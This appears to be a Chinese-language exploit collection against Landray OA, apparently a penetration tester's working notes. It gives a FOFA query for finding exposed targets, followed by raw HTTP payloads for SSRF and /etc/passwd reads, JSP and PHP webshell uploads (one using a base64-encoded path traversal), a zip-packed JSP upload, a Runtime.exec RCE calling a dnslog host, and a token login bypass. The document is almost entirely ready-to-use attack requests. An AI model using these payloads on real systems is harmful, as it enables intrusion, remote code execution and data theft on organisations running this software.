🔪 是否利用过
优先级从高到低
发现日期从近到远
公司团队名_产品名_大版本号_特定小版本号_接口文件名_漏洞类型@发现日期.载荷格式
LandrayOA_Custom_SSRF_JNDI漏洞
LandrayOA_sysSearchMain_Rce漏洞
LandrayOA_Custom_FileRead漏洞
app=“Landray-OA系统”
https://mp.weixin.qq.com/s/O5wGyJhKcddSyiEzmvOVJA
POST /data/sys-common/treexml.tmpl HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
Cmd: cat /etc/passwd
s_bean=ruleFormulaValidate&script=\u0020\u0020\u0020\u0
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
var={"body":{"file":"file:///etc/passwd"}}
POST /sys/attachment/sys_att_main/jg_service.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 210
DBSTEP V3.0 124 0 999
DBSTEP=REJTVEVQ
OPTION=U0FWRUFTSFRNTA==
HTMLNAME=Li4vLi4vLi4vLi4vLi4vZWtwL3Jlc291cmNlL2Vsa3FmY3VmLmpzcA==
RECORDID=
DIRECTORY=
elkqfcuf182323
GET /resource/elkqfcuf.jsp HTTP/1.1
Host:
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
POST /api/client/upload.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Length: 194
------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="ulfile"; filename="lztkkl.php"
Content-Type: image/jpeg
99647lztkkl
------WebKitFormBoundaryVBf7Cs8QWsfwC82M--
GET /upload/lztkkl.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
/sys/zone/sys_zone_personInfo/sysZonePersonInfo.do?.js?=&method=searchPerson&rowsize=50&orderby=&ordertype=up&s_ajax=true
/data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=function test(){ return java.lang.Runtime};r=test();r.getRuntime().exec("ping xxx.dnslog.cn")&type=1
/sys/?outToken=MTE4M2IwYjg0ZWU0ZjU4MWJiYTAwMWM0N2E3OGIyZDk=
https://mp.weixin.qq.com/s/kuKEmoqi7am98ORypTRnlQ
POST /sys/ui/sys_ui_component/sysUiComponent.do?method=getThemeInfo&s_ajax=true HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Content-Length: 533
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=epd2d4omyc4rqc5lv6c4
--epd2d4omyc4rqc5lv6c4
Content-Disposition: form-data; name="file"; filename="daqdajrnx03kihusgzbt.zip"
Content-Type: application/x-zip-compressed
PK;}W]
]
component.iniËL±5202æÊKÌMµ-ÉÌM-.IÌ-(ÖË*.PK;}W´@¨B`htimestamps.jspÈ1ƒ0 Ы° Å,¥ŒT;Wp«|QWV’×oa|ïÖ6yu.U“[
ñã¥ë"õ {ó‘MX3?Ô¤Ó—¸æÄ3|€ØSü*¾+?nDÝ ~6ñ„¿¨oï?PK;}W]
]
€component.iniPK;}W´@¨B`h€Htimestamps.jspPKwÔ
--epd2d4omyc4rqc5lv6c4--